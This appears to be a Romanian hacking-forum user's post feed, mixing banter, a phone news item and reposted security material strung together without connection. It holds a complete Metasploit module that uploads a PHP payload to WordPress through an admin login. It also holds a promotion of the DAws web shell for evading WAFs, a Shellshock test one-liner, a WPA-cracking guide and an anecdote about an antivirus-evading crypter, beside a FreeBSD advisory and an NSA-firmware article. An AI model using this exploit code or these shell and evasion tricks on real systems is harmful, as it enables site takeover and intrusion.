Nytro

La multi ani ba, dai un whiskey cand ajung in Bucuresti, stii tu, ca in vremurile bune

10$ / zi => 300$ pe luna. Mai bine te angajezi la Carrefour.

Astept cu nerabdare realizarile voastre.

Am rezolvat problema cu Dislike-urile.

Allview prezint? X2 Soul PRO, noul s?u top de gam? Aurelian Mihai - 3 mar 2015 Prezent la expozi?ia Mobile World Congress de la Barcelona, Allview a dezv?luit X2 Soul PRO, un nou smartphone high-end pentru pia?a din România. Allview X2 Soul PRO p?streaz? trendul în materie de design al gamei SOUL, încercând s? conving? prin performan?ele procesorului octa-core pe 64-bit, ecranul de 5,2” cu rezolu?e Full HD ?i camerele foto de 13MP ?i 8MP. Noul terminal ruleaz? versiunea Android 5.0 Lollipop. zoom inAllview X2 Soul PRO “X2 Soul PRO este un device care inspir? sim?urile ?i i?i adapteaz? culorile UI-ului la mediul înconjur?tor. Pl?cut la atingere ?i la privire, smartphone-ul va surprinde într-un mod pl?cut atât prin performan?? cât ?i prin func?iile sale.” declar? Lucian Peticil?, Managerul General al companiei. X2 Soul PRO se prezint? într-o carcas? de tip unibody, cu grosime de 5,5 mm ?i este construit din metal ?i sticl? rezistent? la zgârieturi. Designul exterior este eviden?iat prin liniile cromate ale ramei ?i combina?ia curburilor cu suprafe?ele drepte. ?asiul intern este realizat din aliaj de aluminiu ?i magneziu, oferind un bun raport rezisten?? mecanic? / greutate. La interior g?sim un acumulator de 2700 mAh, dimensionat pentru o autonomie de pân? la 11 zile în regim stand-by sau 13 ore în convorbire. Ajutat cu modul “Super Power Saving” de economisire a energiei, telefonul promite s? ofere peste 100 ore de utilizare pentru fiecare înc?rcare a bateriei. Construit folosind tehnologia Full Lamination, ecranul Full HD cu densitate 442 ppi promite unghiuri de vizibilitate generoase ?i o bun? calitate a imaginii. În afara comenzilor preluate prin interfa?a touch, Allview X2 Soul PRO suport? ?i controlul prin gesturi, oferind o modalitate comod? pentru accesarea func?iilor de baz?. Camera principal? de 13MP, un model Sony IMX214 cu 6 lentile, este gestionat? cu ajutorul unei aplica?ii de captur? ce include func?ii precum Magic Focus, Tracks, Best Face, Best Image, Eraser, mod Profesional sau posibilitatea de separare a focusului de expunere. Similar, camera frontal? de 8MPpoate fi utilizat? pentru apeluri video ?i poze selfie, dispunând de toate filtrele men?ionate mai sus. Configura?ia este completat? cu 2GB memorie RAM ?i GPU Mali-T760 MP2 cu frecven?? de 700MHz, dou? sloturi pentru cartel? SIM ?i conectivitate 4G, func?ionând în standardele LTE FDD ?i TDD. Telefonul Allview X2 Soul PRO este disponibil începând de ast?zi pe baz? de precomand? la pre?ul de1699 lei. Sursa: Allview prezint? X2 Soul PRO, noul s?u top de gam? Buna treaba.

Deci ce au facut ilegal?

sbutton? Nu e niciun "sbutton". A testat careva? PS: Am dezactivat temporar pe RST.

Trebuie sa stii bine OOP. Cred ca asta e criteriul de baza. Citeste tot de aici: PHP: Classes and Objects - Manual sau cauta articole pe aceasta tema. Trebuie sa stii sa faci niste SELECT-uri, un JOIN si un INSERT. Trebuie sa stii HTML5/CSS3/JS/jQuery - cel putin elementele de baza: tag-uri/reguli/notiuni de baza/selectori... Uita-te si peste un framework. Zend as sugera eu, dar nu sunt expert. Poate te ajuta @Birkoff

Aduceti si argumente.

Intercepting functions from statically linked libraries January 28, 2015 Ionut Popescu A common technique for blackbox penetration testing of a binary application is intercepting function calls. This technique helps the pentester to properly understand how the application works and to manipulate application data. The problem In most cases, it is pretty easy to intercept a function call: the application calls a function from a shared library (DLL) and you just need to find its address in the DLL’s export address table and breakpoint on it.But it may happen that your target function is from a statically linked library, which means that you cannot find its address by name in the export table. So how to find the target function’s address in this situation? In our case, we have a Windows executable statically linked with OpenSSL and we want to intercept and modify the TLS encrypted traffic which is handled by the SSL_writefunction from OpenSSL.However, the same idea can be applied for other operating systems and libraries. Sursa: Intercepting functions from statically linked libraries – Security Café

Niste jegosi.

1. Ambele - Aplicatiile importante exista pentru ambele platforme 2. Java + Android specific 3. Objective C - iOS specific

Ai fi surprins sa afli pe la ce firme lucreaza persoane de pe aici sau fosti membri.

FreeBSD Security Advisory - IGMP Integer Overflow Authored by Marek Kroemeke, Mateusz Kocielski | Site security.freebsd.org FreeBSD Security Advisory - An integer overflow in computing the size of IGMPv3 data buffer can result in a buffer which is too small for the requested operation. An attacker who can send specifically crafted IGMP packets could cause a denial of service situation by causing the kernel to crash. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-15:04.igmp Security Advisory The FreeBSD Project Topic: Integer overflow in IGMP protocol Category: core Module: igmp Announced: 2015-02-25 Credits: Mateusz Kocielski, Logicaltrust, Marek Kroemeke, and 22733db72ab3ed94b5f8a1ffcde850251fe6f466 Affects: All supported versions of FreeBSD. Corrected: 2015-02-25 05:43:02 UTC (stable/10, 10.1-STABLE) 2015-02-25 05:56:16 UTC (releng/10.1, 10.1-RELEASE-p6) 2015-02-25 05:56:16 UTC (releng/10.0, 10.0-RELEASE-p18) 2015-02-25 05:43:02 UTC (stable/9, 9.3-STABLE) 2015-02-25 05:56:54 UTC (releng/9.3, 9.3-RELEASE-p10) 2015-02-25 05:43:02 UTC (stable/8, 8.4-STABLE) 2015-02-25 05:56:54 UTC (releng/8.4, 8.4-RELEASE-p24) CVE Name: CVE-2015-1414 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. I. Background IGMP is a control plane protocol used by IPv4 hosts and routers to propagate multicast group membership information. IGMP version 3 is implemented on FreeBSD. II. Problem Description An integer overflow in computing the size of IGMPv3 data buffer can result in a buffer which is too small for the requested operation. III. Impact An attacker who can send specifically crafted IGMP packets could cause a denial of service situation by causing the kernel to crash. IV. Workaround Block incoming IGMP packets by protecting your host/networks with a firewall. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-15:04/igmp.patch # fetch https://security.FreeBSD.org/patches/SA-15:04/igmp.patch.asc # gpg --verify igmp.patch.asc Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - ------------------------------------------------------------------------- stable/8/ r279263 releng/8.4/ r279265 stable/9/ r279263 releng/9.3/ r279265 stable/10/ r279263 releng/10.0/ r279264 releng/10.1/ r279264 - ------------------------------------------------------------------------- To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed: # svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NNNNNN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN> VII. References <URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1414> The latest revision of this advisory is available at <URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:04.igmp.asc> -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.1.1 (FreeBSD) iQIcBAEBCgAGBQJU7WjDAAoJEO1n7NZdz2rnjr8QAL0J0+4lRtPXRyDRX2xFSnzw sc3OpfmlTiD3pCFkebTYy3/+EK86iAL1ZELqlJe5mm2+pzhCQB13C4/exc0l1U6b tyiGXxhVi2/4SBrs6n9lmB/YhXkgtqaOQAcNaOD6sVbS1e5cBtjnG86oOq8tQ2qG c7Dvh3HTp9M5fDJtsI40SIpqy3FcKORBfpjYd8jONfSqMnLM2kM8xzwHSv4/X23e GlDKHtIi+1ylD/Qu7Z3S7hqXDTSYjZb1QHc7axDFB6X6nj2Rz3aWS2hPPTypFd3T zTj5DZjgiP7U2LhR40sWW68RYi21yzNUwbe0w5LeDah6Ymc5CDO2ujdm3HDQbQGH pA9QIOjzpgR64nWLIJfZ7jMxL3rCCaCW3NCB/iRXni2Ib/wt3ZDkJyEk/SF4K82H 72U2u2qVjAsnhmwWK8gksBi9bEXk3TnX778bkrwm4rt1xOjACq8k66LAernoE4tB DkE0pO4QR+6XwFb5sJMG/3L9CmrhTp2pkPDBQDbSD+ngBs5V5mJOqVf7gB+UptnN Fh8OACO/5KtDkqBDsCljHxHZNaboVF4Q613+iF5CUc6SYOTkLnBDUE4Pq38vlzVB GdZMEo/hvsCbR4c2TmdKuvEkEqayxCxcv0DXiyTlVCecxSkaYvMXPwCKK43QtS7S het83QCUxaVuxLiznuwR =lkYC -----END PGP SIGNATURE----- Sursa: http://packetstormsecurity.com/files/130557

Maine ai interviul? Nu am fost la Bitdefender, dar am fost la Avira. Postul era de C++ Developer, dar asta nu inseamna ca o sa umbli tu la engine-ul de scanare, probabil postul e pentru tool-uri auxiliare: backup, password manager sau mai stiu eu ce. La mine interviul a avut doua etape (cred): 1. "Interviul" tehnic 2. Discutiile "Interviul tehnic" a fost: ai un calculator cu Visual C++ si conexiune la net. Fa un client TCP care se conecteaza la un server TCP si un server TCP, care suporta mai multi clienti si care raspunde la request-uri. Aveam 3 ore la dispozitie si pentru "punctaj maxim" trebuia sa suporte mai multi clienti, multi-threading, select()... In fine, ideea e ca am facut tot ce trebuia, oricum unde ucrasem inainte facusem astfel de lucruri si mi-a fost foarte usor. La partea a doua insa am stat la discutii cu doua persoane de acolo. Cred ca mi-au pus si intrebari tehnice,probabil de C++ si poate de algoritmica, nu stiu daca si legate de altceva. Partea ciudata a fost ca m-au intrebat la ce proiecte am mai lucrat si le-am zis ca am facut un crypter. Normal, nu stiau ce e acela si le-am explicat ce face: "Pai stiti, face ca un fisier detectabil de antivirus, sa nu mai fie detectabil de antivirus". Nu m-au crezut. Le-am explicat cum functioneaza: "Pai stiti, incarca un executabil in memorie si il executa fara ca acesta sa ajunga pe disk". Tot nu credeau, ziceau ca antivirusul lor stie dintr-astea... In fine. Apoi ma intreaba: "Auzi, dar de ce te-am angaja pe tine, daca te folosesti de sursa antivirusului ca sa faci in continuare cryptere?". Si le raspund cam razand: "Pai stiti, nu am nevoie de sursa antivirusului ca sa fac asa ceva". Nu m-au mai sunat. tl;dr: Sa stii OOP bine: functii virtuale, clase, mostenire si mai stiu eu ce si sa stii binisor algoritmica. Nota: Primesti multe puncte bonus daca ai relatii acolo.

"mario"

https://access.redhat.com/articles/1200223

env X='() { (a)=>\' bash -c 'echo $(date)'; It works...

Nu pare sa mearga.

./clean Nu va mai injurati.

Bypassing Windows Lock Screen via Flash Screensaver February 23, 2015 Adrian Furtuna We have recently discovered an easy method to bypass the Windows Lock screen when a flash screensaver is running.The method allows an attacker to gain unauthorized access to a user’s Windows session if he has physical access to a locked machine. Background info When a user leaves his computer (ex. during a lunch break), he should lock his session in order to prevent other people from doing actions on his behalf.Some computers, mostly in corporate environments, are configured to play a flash animation as screensaver while the computer is locked. This configuration is done by specifying a path to a .scr file that should be played by the flash player – using the following registry key: HKEY_USERS\.DEFAULT\Control Panel\Desktop\SCRNSAVE.EXE Articol complet: http://securitycafe.ro/2015/02/23/bypassing-windows-lock-screen-via-flash-screensaver/

WordPress Admin Shell Upload Authored by Rob Carr | Site metasploit.comThis Metasploit module will generate a plugin, pack the payload into it and upload it to a server running WordPress providing valid admin credentials are used. ### This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/zip' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress Admin Shell Upload', 'Description' => %q{ This module will generate a plugin, pack the payload into it and upload it to a server running WordPress providing valid admin credentials are used. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rob Carr <rob[at]rastating.com>' # Metasploit module ], 'DisclosureDate' => 'Feb 21 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['WordPress', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']), OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']) ], self.class) end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def generate_plugin(plugin_name, payload_name) plugin_script = %Q{<?php /** * Plugin Name: #{plugin_name} * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)} * Author: #{Rex::Text.rand_text_alpha(10)} * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com * License: GPL2 */ ?>} zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script) zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded) zip end def exploit fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? print_good("#{peer} - Authenticated with WordPress") print_status("#{peer} - Preparing payload...") plugin_name = Rex::Text.rand_text_alpha(10) payload_name = "#{Rex::Text.rand_text_alpha(10)}" payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php") zip = generate_plugin(plugin_name, payload_name) print_status("#{peer} - Uploading payload...") uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie) fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded print_status("#{peer} - Executing the payload at #{payload_uri}...") register_files_for_cleanup("#{payload_name}.php") register_files_for_cleanup("#{plugin_name}.php") send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5) end end Sursa: WordPress Admin Shell Upload ? Packet Storm

Cracking WPA WPA2 with Kali Linux (verbal step by step guide) This is a full verbal step by step guide on how to crack WPA and WPA2 encrypted passwords using aircrack-ng suit on Kali Linux If you are using VMware, Virtual box, or any Virtual application you will need to use an external USB WIFI card capable of packet injection. The WIFI card I use with and without my VMware is listed bellow. USE ctrl+c TO STOP THE PROGRAM AND GET YOUR COMMAND PROMPT BACK My Wireless card: Alfa Networks AWUSO36NHA you can buy this card online for around $25 - $40 to check if your card can do packet injection after creating the monitor mode interface open a terminal and type in: aireplay-ng -9 mon0 This will tell you your percentage of injection. OR check out http://www.aircrack-ng.org/doku.php?i... http://www.aircrack-ng.org/doku.php?i... WPA - WPA2 wordlist -- Let me google that for you

Hello everyone, About There's multiple things that makes DAws better than every Web Shell out there: Supports CGI by dropping Bash Shells (for Linux) and Batch Shells (for Windows). Bypasses WAFs, Disablers and Protection Systems; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if shell_exec was disabled it would automatically use exec or passthru or system or popen or proc_open instead, same for Downloading a File from a Link, if Curl was disabled then file_get_content is used instead and this Feature is widely used in every section and fucntion of the shell. (Yes, it bypasses Suhosin too) Automatic Encoding; DAws randomly and automatically encodes most of your GET and POST data using XOR(Randomized key for every session) + Base64(We created our own Base64 encoding functions instead of using the PHP ones to bypass Disablers) which will allow your shell to Bypass pretty much every WAF out there. Advanced File Manager; DAws's File Manager contains everything a File Manager needs and even more but the main Feature is that everything is dynamically printed; the permissions of every File and Folder are checked, now, the functions that can be used will be available based on these permissions, this will save time and make life much easier. Tools: DAws holds bunch of useful tools such as "bpscan" which can identify useable and unblocked ports on the server within few minutes which can later on allow you to go for a bind shell for example. Everything that can't be used at all will be simply removed so Users do not have to waste their time. We're for example mentioning the execution of c++ scripts when there's no c++ compilers on the server(DAws would have checked for multiple compilers in the first place) in this case, the function would be automatically removed and the User would know. Supports Windows and Linux. Openned Source. Extra Info Directory Romaing: DAws checks, within the `web` directory, for a Writable and Readable Directory which will then be used to Drop and Execute needed scripts which will guarantee their success. [*]Eval Form: `include`, `include_once`, `require` or `require_once` are being used instead PHP `eval` to bypass Protection Systems. [*]Download from Link - Methods: PHP Curl File_put_content [*]Zip - Methods: Linux: Zip [*]Windows: Vbs Script [*]Shells and Tools: Extra: `nohup`, if installed, is automatically used for background processing. Updates: DAws is always getting updated, I guess that's enough for this part Lol. Credits: dotcppfile Aces Sursa: https://github.com/dotcppfile/DAws

How the NSA’s Firmware Hacking Works and Why It’s So Unsettling By Kim Zetter 02.22.15 | One of the most shocking parts of the recently discovered spying network Equation Group is its mysterious module designed to reprogram or reflash a computer hard drive’s firmware with malicious code. The Kaspersky researchers who uncovered this said its ability to subvert hard drive firmware—the guts of any computer—“surpasses anything else” they had ever seen. The hacking tool, believed to be a product of the NSA, is significant because subverting the firmware gives the attackers God-like control of the system in a way that is stealthy and persistent even through software updates. The module, named “nls_933w.dll”, is the first of its kind found in the wild and is used with both the EquationDrug and GrayFish spy platforms Kaspersky uncovered. It also has another capability: to create invisible storage space on the hard drive to hide data stolen from the system so the attackers can retrieve it later. This lets spies like the Equation Group bypass disk encryption by secreting documents they want to seize in areas that don’t get encrypted. Kaspersky has so far uncovered 500 victims of the Equation Group, but only five of these had the firmware-flashing module on their systems. The flasher module is likely reserved for significant systems that present special surveillance challenges. Costin Raiu, director of Kaspersky’s Global Research and Analysis Team, believes these are high-value computers that are not connected to the internet and are protected with disk encryption. Here’s what we know about the firmware-flashing module. How It Works Hard drive disks have a controller, essentially a mini-computer, that includes a memory chip or flash ROM where the firmware code for operating the hard drive resides. When a machine is infected with EquationDrug or GrayFish, the firmware flasher module gets deposited onto the system and reaches out to a command server to obtain payload code that it then flashes to the firmware, replacing the existing firmware with a malicious one. The researchers uncovered two versions of the flasher module: one that appears to have been compiled in 2010 and is used with EquatinoDrug and one with a 2013 compilation date that is used with GrayFish. The Trojanized firmware lets attackers stay on the system even through software updates. If a victim, thinking his or her computer is infected, wipes the computer’s operating system and reinstalls it to eliminate any malicious code, the malicious firmware code remains untouched. It can then reach out to the command server to restore all of the other malicious components that got wiped from the system. Even if the firmware itself is updated with a new vendor release, the malicious firmware code may still persist because some firmware updates replace only parts of the firmware, meaning the malicious portions may not get overwritten with the update. The only solution for victims is to trash their hard drive and start over with a new one. The attack works because firmware was never designed with security in mind. Hard disk makers don’t cryptographically sign the firmware they install on drives the way software vendors do. Nor do hard drive disk designs have authentication built in to check for signed firmware. This makes it possible for someone to change the firmware. And firmware is the perfect place to conceal malware because antivirus scanners don’t examine it. There’s also no easy way for users to read the firmware and manually check if it’s been altered. The firmware flasher module can reprogram the firmware of more than a dozen different hard drive brands, including IBM, Seagate, Western Digital, and Toshiba. “You know how much effort it takes to land just one firmware for a hard drive? You need to know specifications, the CPU, the architecture of the firmware, how it works,” Raiu says. The Kaspersky researchers have called it “an astonishing technical accomplishment and is testament to the group’s abilities.” Once the firmware is replaced with the Trojanized version, the flasher module creates an API that can communicate with other malicious modules on the system and also access hidden sectors of the disk where the attackers want to conceal data they intend to steal. They hide this data in the so-called service area of the hard drive disk where the hard disk stores data needed for its internal operation. Hidden Storage Is the Holy Grail The revelation that the firmware hack helps store data the attackers want to steal didn’t get much play when the story broke last week, but it’s the most significant part of the hack. It also raises a number of questions about how exactly the attackers are pulling this off. Without an actual copy of the firmware payload that gets flashed to infected systems, there’s still a lot that’s unknown about the attack, but some of it can be surmised. The ROM chip that contains the firmware includes a small amount of storage that goes unused. If the ROM chip is 2 megabytes, the firmware might take up just 1.5 megabytes, leaving half a megabyte of unused space that can be employed for hiding data the attackers want to steal. This is particularly useful if the the computer has disk encryption enabled. Because the EquationDrug and GrayFish malware run in Windows, they can grab a copy of documents while they’re unencrypted and save them to this hidden area on the machine that doesn’t get encrypted. There isn’t much space on the chip for a lot of data or documents, however, so the attackers can also just store something equally as valuable to bypass encryption. “Taking into account the fact that their GrayFish implant is active from the very boot of the system, they have the ability to capture the encryption password and save it into this hidden area,” Raiu says. Authorities could later grab the computer, perhaps through border interdiction or something the NSA calls “customs opportunities,” and extract the password from this hidden area to unlock the encrypted disk. Raiu thinks the intended targets of such a scheme are limited to machines that are not connected to the internet and have encrypted hard drives. One of the five machines they found hit with the firmware flasher module had no internet connection and was used for special secure communications. “[The owners] only use it in some very specific cases where there is no other way around it,” Raiu says. “Think about Bin Laden who lived in the desert in an isolated compound—doesn’t have internet and no electronic footprint. So if you want information from his computer how do you get it? You get documents into the hidden area and you wait, and then after one or two years you come back and steal it. The benefits [of using this] are very specific.” Raiu thinks, however, that the attackers have a grander scheme in mind. “In the future probably they want to take it to the next level where they just copy all the documents [into the hidden area] instead of the password. [Then] at some point, when they have an opportunity to have physical access to the system, they can then access that hidden area and get the unencrypted docs.” They wouldn’t need the password if they could copy an entire directory from the operating system to the hidden sector for accessing later. But the flash chip where the firmware resides is too small for large amounts of data. So the attackers would need a bigger hidden space for storage. Luckily for them, it exists. There are large sectors in the service area of the hard drive disk that are also unused and could be commandeered to store a large cache of documents, even ones that might have been deleted from other parts of the computer. This service area, also called the reserved are or system area, stores the firmware and other data needed to operate drives, but it also contains large portions of unused space. An interesting paper (.pdf) published in February 2013 by Ariel Berkman, a data recovery specialist at the Israeli firm Recover, noted “not only that these areas can’t be sanitized (via standard tools), they cannot be accessed via anti-virus software [or] computer forensics tools.” Berkman points out that one particular model of Western Digital drives has 141 MB reserved for the service area, but only uses 12 MB of this, leaving the rest free for stealth storage. To write or copy data to service area requires special commands that are specific to each vendor and are not publicly documented, so an attacker would need to uncover what these are. But once they do, “y sending Vendor Specific Commands (VSCs) directly to the hard-drive, one can manipulate these [service] areas to read and write data that are otherwise inaccessible,” Berkman writes. It is also possible, though not trivial, to write a program to automatically copy documents to this area. Berkman himself wrote a proof-of-concept program to read and write a file of up to 94 MB to the service area, but the program was a bit unstable and he noted that it could cause some data loss or cause the hard drive to fail. One problem with hiding large amounts of data like this, however, is that its presence might be detected by examining the size of the used space in the service area. If there should be 129 MB of unused space in this sector but there’s only 80 MB, it’s a dead giveaway that something is there that shouldn’t be. But a leaked NSA document that was written in 2006 but was published by Der Spiegel last month suggests the spy agency might have resolved this particular problem. NSA Interns to the Rescue The document (.pdf) is essentially a wish list of future spy capabilities the NSA hoped to develop for its so-called Persistence Division, a division that has an attack team within it that focuses on establishing and maintaining persistence on compromised machines by subverting their firmware, BIOS, BUS or drivers. The document lists a number of projects the NSA put together for interns to tackle on behalf of this attack team. Among them is the “Covert Storage” project for developing a hard drive firmware implant that can prevent covert storage on disks from being detected. To do this, the implant prevents the system from disclosing the true amount of free space available on the disk. “The idea would be to modify the firmware of a particular hard drive so that it normally only recognizes, say, half of its available space,” the document reads. “It would report this size back to the operating system and not provide any way to access the additional space.” Only one partition of the drive would be visible on the partition table, leaving the other partitions—where the hidden data was stored—invisible and inaccessible. The modified firmware would have a special hook embedded in it that would unlock this hidden storage space only after a custom command was sent to the drive and the computer was rebooted. The hidden partition would then be available on the partition table and accessible until the secret storage was locked again with another custom command. How exactly the spy agency planned to retrieve the hidden data was unclear from the eight-year-old document. Also unclear is whether the interns ever produced a firmware implant that accomplished what the NSA sought. But given that the document includes a note that interns would be expected to produce a solution for their project within six months after assignment, and considering the proven ingenuity of the NSA in other matters, they no doubt figured it out. Sursa: http://www.wired.com/2015/02/nsa-firmware-hacking/